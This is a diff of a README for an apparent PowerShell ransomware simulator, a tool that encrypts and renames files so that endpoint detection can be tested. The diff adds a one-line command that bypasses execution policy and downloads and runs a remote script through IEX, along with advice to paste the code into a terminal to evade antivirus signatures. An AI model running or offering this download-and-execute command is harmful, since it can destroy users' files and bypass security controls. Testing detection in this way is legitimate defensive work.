eddiechu/Powershell-ransomware-simulator/README.md

 # This tool

-Please copy and paste the PowerShell code to terminal, this way can bypass antivirus signature and simulate the real ransomware behaviour

 ![alt text](https://raw.githubusercontent.com/eddiechu/Powershell-ransomware-simulator/main/Image/powershell1.gif)

 This tool encrypts - overwrite - rename the files in the selected (local or network) folder and subfolder, you may create a temporary folder like C:\Ransomware-Simulator\, save this tool to there, then run it.
 Be safe.

+- copy and paste the PowerShell code to terminal, this way can bypass antivirus signature and simulate the real ransomware behaviour
+- powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/eddiechu/Powershell-ransomware-simulator/main/EncryptDelTestv4.1.ps1.txt')"

 It tests if your endpoint can detect when encryption is happening (like base on the files change pattern), but NOT to test if your endpoint can prevent it from start.